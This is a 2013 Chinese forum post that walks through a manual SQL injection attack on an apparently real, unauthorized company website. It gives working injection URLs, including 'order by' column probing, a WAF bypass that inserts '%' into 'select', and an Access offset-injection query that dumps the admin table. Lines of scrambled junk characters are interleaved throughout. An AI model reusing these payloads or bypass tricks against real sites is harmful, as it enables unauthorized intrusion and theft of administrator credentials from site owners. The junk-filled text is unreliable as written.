中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
2 T, ~% p$ Y, l, h/ N7 s/ r
" O0 w4 o G: o% [% d0 n
3 z4 x& u+ ~$ q" g, ]
顺手加个admin
4 z1 A) q4 a7 j- j$ C9 f
% O. u! {& Y/ r' v
( y: ^& V- n* [- k) M
默认后台。
@4 V7 @; b5 S* C I0 M
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
* l% ~, ~ g% F. x# ?
9 A* w; a7 X& g4 S3 D
8 V' g9 ?3 |6 O& ~
" q6 c+ j# } G! ^3 D
所以就不用御剑扫了,待会直接封IP。
. m5 M/ [* [$ ~% O0 ~
) q* d, Z4 [6 ]5 ], s* b
用order by语句判断是否存在注入。
8 e/ m5 O+ j+ U" _+ p5 J5 l7 [
http://www.xxx.com
/product_show.asp?id=997 order by 1
i3 B& f) }, n1 c$ u/ g
http://www.xxx.com
/product_show.asp?id=997 order by 100
3 e* T; {* a: ?7 E3 O$ `4 X& J
现在存在注入,经测试后发现是9个字段。
6 t. ]% Y0 u: V( D
# i/ K" v9 F; c' `6 Y0 b) Z
接下来进行联合查询,猜是否存在admin表。
+ W4 R/ z. M4 R' h6 ]/ W$ e: R
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
1 j* P; K9 e2 D# f
8 Q- q$ a7 o$ P7 u) z
- O# e. I7 B! `! W& V" }- H
3 s* x: @: `3 i) _9 P% I
在select中间加个%,se%lect绕过安全狗。
0 V9 ?$ w$ m# {. ~6 w! A A* o
& Z3 m1 w2 P7 l4 P. @& k* l, R7 c
6 t& Q: {# w9 J3 O. r$ G. U
发现存在admin表,然后开始手工猜常用的字段。
9 }6 r8 U" v9 D P& d1 [% n4 s
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
) S, W$ A: a' t* _0 N9 ?
+ x0 U8 L4 b) ?' ?& ?3 u2 O4 O$ f& K
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
0 i2 o( e7 U5 T; L5 C! C2 W+ _
: b- t4 ]- ?5 w, {# h! X
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
6 F3 I! p1 L6 }$ s- q+ o, ~
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
4 U# i, J, X4 O% H$ M0 u
好了,敏感内容出显了。
: A9 ?6 y& H9 @" l: b# p
, {: P+ o3 X& c$ u: j
8 i; i$ E, e! _' B0 i1 c
5 ?3 B5 i+ E. q+ v
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2